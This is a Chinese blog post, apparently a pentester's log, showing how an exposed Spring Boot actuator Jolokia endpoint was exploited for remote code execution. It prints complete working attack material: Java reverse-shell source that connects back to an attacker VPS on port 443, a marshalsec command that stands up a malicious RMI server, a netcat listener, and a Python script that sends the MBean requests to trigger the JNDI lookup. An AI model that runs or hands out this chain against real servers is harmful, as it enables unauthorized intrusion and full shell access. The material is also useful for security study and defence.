日穿扫描扫到一个spring boot actuator

可以看到有jolokia这个端点,再看下jolokia/list,存在type=MBeanFactory 关键字



可以使用jolokia-realm-jndi-rce具体步骤如下

先用python3开一个web服务

python3 -m http.server 8080

编译java利用代码

/**

 *  javac -source 1.5 -target 1.5 JNDIObject.java

 *

 *  Build By LandGrey

 * */

import java.io.File;

import java.io.InputStream;

import java.io.OutputStream;

import java.net.Socket;

public class JNDIObject {

    static {

        try{

            String ip = "your-vps-ip";

            String port = "443";

            String py_path = null;

            String[] cmd;

            if (!System.getProperty("os.name").toLowerCase().contains("windows")) {

                String[] py_envs = new String[]{"/bin/python", "/bin/python3", "/usr/bin/python", "/usr/bin/python3", "/usr/local/bin/python", "/usr/local/bin/python3"};

                for(int i = 0; i < py_envs.length; ++i) {

                    String py = py_envs[i];

                    if ((new File(py)).exists()) {

                        py_path = py;

                        break;

                    }

                }

                if (py_path != null) {

                    if ((new File("/bin/bash")).exists()) {

                        cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/bash\")"};

                    } else {

                        cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/sh\")"};

                    }

                } else {

                    if ((new File("/bin/bash")).exists()) {

                        cmd = new String[]{"/bin/bash"};

                    } else {

                        cmd = new String[]{"/bin/sh"};

                    }

                }

            } else {

                cmd = new String[]{"cmd.exe"};

            }

            Process p = (new ProcessBuilder(cmd)).redirectErrorStream(true).start();

            Socket s = new Socket(ip, Integer.parseInt(port));

            InputStream pi = p.getInputStream();

            InputStream pe = p.getErrorStream();

            InputStream si = s.getInputStream();

            OutputStream po = p.getOutputStream();

            OutputStream so = s.getOutputStream();

            while(!s.isClosed()) {

                while(pi.available() > 0) {

                    so.write(pi.read());

                }

                while(pe.available() > 0) {

                    so.write(pe.read());

                }

                while(si.available() > 0) {

                    po.write(si.read());

                }

                so.flush();

                po.flush();

                Thread.sleep(50L);

                try {

                    p.exitValue();

                    break;

                } catch (Exception e) {

                }

            }

            p.destroy();

            s.close();

        }catch (Throwable e){

            e.printStackTrace();

        }

    }

}


javac -source 1.5 -target 1.5 JNDIObject.java

架设恶意 rmi 服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://vps:8080/#JNDIObject 1389

监听端口

nc -lvp 443



执行exp

#!/usr/bin/env python3

# coding: utf-8

# Referer: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt

import requests

url = 'http://127.0.0.1:8080/jolokia'

create_realm = {

    "mbean": "Tomcat:type=MBeanFactory",

    "type": "EXEC",

    "operation": "createJNDIRealm",

    "arguments": ["Tomcat:type=Engine"]

}

wirte_factory = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "WRITE",

    "attribute": "contextFactory",

    "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"

}

write_url = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "WRITE",

    "attribute": "connectionURL",

    "value": "rmi://your-vps-ip:1389/JNDIObject"

}

stop = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "EXEC",

    "operation": "stop",

    "arguments": []

}

start = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "EXEC",

    "operation": "start",

    "arguments": []

}

flow = [create_realm, wirte_factory, write_url, stop, start]

for i in flow:

    print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))

    r = requests.post(url, json=i)

    r.json()

    print(r.status_code)


python3 springboot-realm-jndi-rce.py



然后等两秒shell就回来了

那些年拿过的shell之springboot jolokia rce的更多相关文章

  1. springboot打包不同环境配置与shell脚本部署

    本篇和大家分享的是springboot打包并结合shell脚本命令部署,重点在分享一个shell程序启动工具,希望能便利工作: profiles指定不同环境的配置 maven-assembly-plu ...

  2. Shell脚本 自动部署 SpringBoot 应用

    公司项目使用了SpringBoot.开发的应用需要自动上传到服务器.虽然目前对热部署还没完全掌握.先使用shell简化一下部署吧. # 上传密钥 sshLoginKey=/f/MyFile/root. ...

  3. 【springboot】之利用shell脚本优雅启动,关闭springboot服务

    springbot开发api接口服务,生产环境中一般都是运行独立的jar,在部署过程中涉及到服务的优雅启动,关闭, springboot官方文档给出的有两种方式, 1.使用http shutdown ...

  4. 在idea中编写自动拉取、编译、启动springboot项目的shell脚本

    idea 开发环境搭建 idea中安装shell开发插件 服务器具备的条件 已经安装 lsof(用于检查端口占用) 已安装 git 安装 maven 有 java 环境 背景 代码提交到仓库后,需要在 ...

  5. 编写shell脚本让springboot项目在CentOS中开机自启动

    springboot项目部署在CentOS系统上时,如果遇到停电关机,公司的实施人员就得跑到甲方现场重新启动项目并测试,很是麻烦,这里探讨如何编写shell脚本控制springboot项目开机时自动启 ...

  6. Dockerfile 构建后端springboot应用并用shell脚本实现jenkins自动构建

    Dockerfile 文件构建docker镜像 FROM centos MAINTAINER zh*****eng "z*******ch.cn" ENV LANG en_US.U ...

  7. SpringBoot打成的jar包发布,shell关闭之后一直在服务器运行

    1:可以编写shell脚本, 切换到执行的jar包目录,然后使用nohup  让改命令在服务器一直运行 #!/bin/bash cd /srv/ftp/public nohup java -jar l ...

  8. springboot使用api操作HBase之shell

    HBase的基本读写流程写入流程读取流程HBase的模块与协作HBase启动RegionServer失效HMaster失效HBase常用的Shell命令进入shellhelp命令查询服务器状态查看所有 ...

  9. 编写shell脚本,使用 nohup 让springboot 项目在后台持续运行

    1.将springboot项目打成jar放在linux的某个目录下. 2.新建一个nohup.log文件. 3.使用vi命令新建一个start.sh文件并写下以下内容: #!/bin/sh nohup ...

随机推荐

  1. STL初步学习(map)

    3.map map作为一个映射,有两个参数,第一个参数作为关键值,第二个参数为对应的值,关键值是唯一的 在平时使用的数组中,也有点类似于映射的方法,例如a[10]=1,但其实我们的关键值和对应的值只能 ...

  2. HTML5(三)SVG vs. Canvas

    HTML5 内联 SVG 什么是SVG? SVG 指可伸缩矢量图形 (Scalable Vector Graphics) SVG 用于定义用于网络的基于矢量的图形 SVG 使用 XML 格式定义图形 ...

  3. finally 关键字

    异常处理的时侯 出现的关键字finally 不论在  try  代码块中是否出现  发生了异常时间,  catch语句是否执行,catch语句是否有异常,catch语句中是否return关键字  ,f ...

  4. Rancher1.6 部署prometheus

    一.rancher基础配置 镜像:prom/prometheus:latest 映射端口:9090:9090 服务连接: blackbox-exporter cadvisor node-exporte ...

  5. 【Hack.lu-2017】FlatScience

    信息: 题目来源:Hack.lu-2017 标签:SQL注入.源码泄露 解题过程 题目页面有多层,存在许多pdf文件,首先进行目录扫描: [TIME] => 2020-07-07 16:08:5 ...

  6. HTB::OpenAdmin

    实验环境 渗透过程 0x01 信息搜集 sudo nmap -sS -p1-10000 -sV -sC -T4 10.10.10.171 开放了22(SSH)端口和80(HTTP)端口 访问80端口, ...

  7. java 数据结构(八):Iterator接口与foreach循环

    1.遍历Collection的两种方式:① 使用迭代器Iterator ② foreach循环(或增强for循环)2.java.utils包下定义的迭代器接口:Iterator2.1说明:Iterat ...

  8. 数据可视化之powerBI基础(三)编辑交互,体验更灵活的PowerBI可视化

    https://zhuanlan.zhihu.com/p/64412190 PowerBI可视化与传统图表的一大区别,就是可视化分析是动态的,通过页面上筛选.钻取.突出显示等交互功能,可以快速进行访问 ...

  9. SQLAlchemy01 /SQLAlchemy去连接数据库、ORM介绍、将ORM模型映射到数据库中

    SQLAlchemy01 /SQLAlchemy去连接数据库.ORM介绍.将ORM模型映射到数据库中 目录 SQLAlchemy01 /SQLAlchemy去连接数据库.ORM介绍.将ORM模型映射到 ...

  10. 07 flask源码剖析之用户请求过来流程

    07 Flask源码之:用户请求过来流程 目录 07 Flask源码之:用户请求过来流程 1.创建ctx = RequestContext对象 2. 创建app_ctx = AppContext对象 ...